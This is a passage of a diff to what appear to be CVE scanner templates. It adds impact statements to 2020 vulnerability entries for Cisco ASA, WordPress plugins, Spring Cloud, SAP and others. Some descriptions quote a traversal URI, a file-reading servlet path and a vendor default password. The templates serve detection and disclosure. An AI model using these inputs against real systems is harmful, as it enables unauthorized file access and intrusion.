@@ -6,6 +6,8 @@ info: severity: high description: | Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the affected system. remediation: | Apply the necessary security patches or updates provided by Cisco to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 5a9c40133f..a92aea8e4c 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -5,6 +5,8 @@ info: author: PR3R00T severity: high description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. + impact: | + Low: Information disclosure remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 09b989aa2e..0786f6b27f 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml 
@@ -5,6 +5,8 @@ info: author: Jeya Seelan severity: critical description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the server. remediation: | Change the default credentials to strong and unique ones. reference: diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 43f3323a34..ca274ef38a 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 74c48913ac..6edf3960cb 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -5,6 +5,8 @@ info: author: soyelmago severity: critical description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to the target system and potential remote code execution. remediation: | Update to the latest version of the Contact Form 7 plugin to mitigate this vulnerability. reference: 
diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index d675bb2392..902654cbe5 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade to SearchBlox version 9.2.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 6148104d45..8ff0f74592 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0. reference: diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 281c0ede28..dff3f2f0f9 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Update the Belkin Linksys RE6500 firmware to version 1.0.012.001 or later. reference: diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 4c7692fa84..3675200023 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7. + impact: | + An attacker can execute arbitrary commands on the server, leading to remote code execution and potential compromise of the system. remediation: | Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch. reference: diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 6135c7e3d6..5ef50b6386 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate the LFI vulnerability in GateOne 1.1. reference: diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index f16b69a0b8..51782baa96 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. remediation: | Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 77e7cc94f6..5cf5d6a821 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement. remediation: | Apply the latest security patches or updates provided by Twitter to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 682ebe4c57..09f1b1160a 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the reference links. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index c3c86b412b..0f1d5ff738 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability. reference: 
diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index a39283715a..c166ab3253 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, potentially leading to unauthorized access, data manipulation, or denial of service. remediation: | Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index fa769366de..a615429263 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form. + impact: | + Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption. remediation: | Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index bfa76ac8f1..0a4eaefa2a 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml 
@@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). + impact: | + This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise. remediation: | Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 50a2e77bf2..c0223c03d8 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 2ece3d397d..4a5d7b4f0e 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index fdb7b46403..d1300ee810 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 0841c06c90..5cdb027bee 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index 38f5c0c88c..df87d6235a 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. + impact: | + An attacker can gain access to sensitive information, potentially leading to further attacks. remediation: | Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 4593a4b02e..ea8e9f21b0 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index 10d46fdf44..6ec094da05 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index 25d368937e..ccfcafadad 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml 
@@ -9,6 +9,8 @@ info: XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. + impact: | + The vulnerability can lead to unauthorized access to sensitive information or a denial of service. remediation: | Apply the latest security patches or updates provided by IBM to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index eaa5e1bb08..518e7497e1 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 3a9961fc2a..f72ebee6d0 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0. reference: diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 7fff0718d8..a9a90233e6 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob,dwisiswant0 severity: medium description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: This issue is fixed in version 9.3.2. reference: - https://github.com/zeit/next.js/releases/tag/v9.3.2 diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index c4b4830121..f6a453a74a 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0. reference: diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index 420a19df8f..f2cc4adeb7 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 9862e8a51a..b748e7e075 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml 
@@ -5,6 +5,8 @@ info: author: mavericknerd severity: high description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack. + impact: | + An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches. reference: diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 7197156ee4..a1884ad635 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability can result in unauthorized access to sensitive data or systems, leading to potential data breaches or further exploitation. remediation: | Apply the latest security patches or updates provided by Spring Cloud Netflix to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index bc36a779aa..a0c15232a7 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml 
@@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index f8d99a687e..e5bc898881 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session. + impact: | + Successful exploitation of this vulnerability could allow an attacker to perform unauthorized actions on behalf of the victim user. remediation: | Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation. reference: diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 31712c76b1..d032e82937 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Magento Mass Importer plugin. remediation: | Upgrade to version 0.7.24 or later to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 8a4e4d8ca3..a8591cd6a6 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0,ringo severity: critical description: F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or upgrade to a non-vulnerable version of F5 BIG-IP TMUI. reference: diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index c6baa16471..a0cd9665f1 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 44d50b4222..0996451ce6 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -5,6 +5,8 @@ info: author: _generic_human_ severity: critical description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Apply the latest security patches provided by SAP to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index ec79793e3f..0287a222a9 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system. + impact: | + Successful exploitation of this vulnerability allows an attacker to gain unauthorized administrative access to the SAP system. remediation: | Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 994a9fa875..5be41b2a4f 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access to internal resources or further attacks. remediation: | Apply the relevant security patches provided by SAP to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 2cb87321dc..a0fb029ccf 100644 
--- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest security patch or upgrade to a patched version of OpenSIS. reference: diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index b8a7c88fb3..d3c2cac46b 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: Fixed in version 1.8.30. reference: - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33 diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index defb7bdfc3..e383a4a3e8 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml 
